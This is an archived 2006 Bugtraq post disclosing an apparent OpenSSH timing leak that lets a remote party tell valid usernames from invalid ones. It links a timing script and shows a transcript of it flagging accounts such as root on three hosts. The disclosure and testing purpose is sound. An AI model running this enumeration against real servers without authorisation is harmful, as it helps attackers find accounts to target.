yet another OpenSSH timing leak? Oct 09 2006 10:33AM
Marco Ivaldi (raptor 0xdeadbeef info) (1 replies)
Hello Bugtraq,

Here we are again... During a recent penetration test i stumbled upon yet
another OpenSSH timing leak, leading to remote disclosure of valid
usernames. It's not as big as the one i found in the past (CVE-2003-0190),
but it can indeed be exploited over the Internet, nevertheless.

This time, OpenSSH-portable apparently introduces a small delay (see
attached transcript for details) when verifying access credentials for
users with a password set: it doesn't matter if they don't have a valid
shell or login has been disabled through an sshd_config directive.

So far, i've not been able to determine the root cause of this exposure
and i've reproduced it only on some fully-patched SUSE Linux 10.0 boxes
(OpenSSH_4.1 + SUSE patches, both protocols 1 and 2 are affected, with or
without PAM authentication), therefore it may be a SUSE-specific and/or a
configuration-dependant flaw (latest tests on some freshly installed SUSE
systems didn't show the flawed behaviour).

That said, there are probably other timing leaks involving third-party
patches (x509 certs, LDAP, and so on), logging, and custom configurations,
as well as other ways in which valid usernames may be probed for (i.e.,
with RSA/DSA authentication) -- thus i decided to release a small script
for testing timing patterns in sshd replies:

http://www.0xdeadbeef.info/code/sshtime

It needs expect, and target ssh hostkey must be already added. I'd be very
interested in knowing the results of tests performed on other distros and
configurations.

Thanks to Solar Designer and Andrea Barisani for the interesting
discussion on this topic.

Cheers,

--
Marco Ivaldi
Antifork Research, Inc. http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707raptor@pandora:~$ #

raptor@pandora:~$ # Over 100 Mbps LAN (slow computer)

raptor@pandora:~$ #

raptor@pandora:~$ ./sshtime 2.mediaservice.net smalldict

sshtime v0.1 - Simple OpenSSH remote timing attack tool

Copyright (c) 2006 Marco Ivaldi <raptor (at) 0xdeadbeef (dot) info [email concealed]>

admin (at) 2.mediaservice (dot) net [email concealed] real 0.13

ftp (at) 2.mediaservice (dot) net [email concealed] real 0.13

media (at) 2.mediaservice (dot) net [email concealed] real 0.80 <- valid user with shell

nobody (at) 2.mediaservice (dot) net [email concealed] real 0.13

raptor (at) 2.mediaservice (dot) net [email concealed] real 0.13

root (at) 2.mediaservice (dot) net [email concealed] real 0.79 <- valid user with shell

test (at) 2.mediaservice (dot) net [email concealed] real 0.13

wwwrun (at) 2.mediaservice (dot) net [email concealed] real 0.14

raptor@pandora:~$ #

raptor@pandora:~$ # 100 Mbps LAN (faster computer)

raptor@pandora:~$ #

raptor@pandora:~$ ./sshtime 3.mediaservice.net smalldict

sshtime v0.1 - Simple OpenSSH remote timing attack tool

Copyright (c) 2006 Marco Ivaldi <raptor (at) 0xdeadbeef (dot) info [email concealed]>

admin (at) 3.mediaservice (dot) net [email concealed] real 0.09

ftp (at) 3.mediaservice (dot) net [email concealed] real 0.09

media (at) 3.mediaservice (dot) net [email concealed] real 0.32 <- valid user with shell

nobody (at) 3.mediaservice (dot) net [email concealed] real 0.09

raptor (at) 3.mediaservice (dot) net [email concealed] real 0.09

root (at) 3.mediaservice (dot) net [email concealed] real 0.32 <- valid user with shell

test (at) 3.mediaservice (dot) net [email concealed] real 0.09

wwwrun (at) 3.mediaservice (dot) net [email concealed] real 0.09

raptor@pandora:~$ #

raptor@pandora:~$ # Over the Internet

raptor@pandora:~$ #

raptor@pandora:~$ ./sshtime 4.mediaservice.net smalldict

sshtime v0.1 - Simple OpenSSH remote timing attack tool

Copyright (c) 2006 Marco Ivaldi <raptor (at) 0xdeadbeef (dot) info [email concealed]>

admin (at) 4.mediaservice (dot) net [email concealed] real 1.22

ftp (at) 4.mediaservice (dot) net [email concealed] real 1.17

media (at) 4.mediaservice (dot) net [email concealed] real 1.22

nobody (at) 4.mediaservice (dot) net [email concealed] real 1.17

raptor (at) 4.mediaservice (dot) net [email concealed] real 1.22

root (at) 4.mediaservice (dot) net [email concealed] real 1.77 <- valid user with shell

test (at) 4.mediaservice (dot) net [email concealed] real 1.27

wwwrun (at) 4.mediaservice (dot) net [email concealed] real 1.77 <- valid user without shell

raptor@pandora:~$

[ reply ]
Re: yet another OpenSSH timing leak? Oct 09 2006 10:41PM
Gianluca Varisco (giangy techtemple org)


 

Privacy Statement
Copyright 2010, SecurityFocus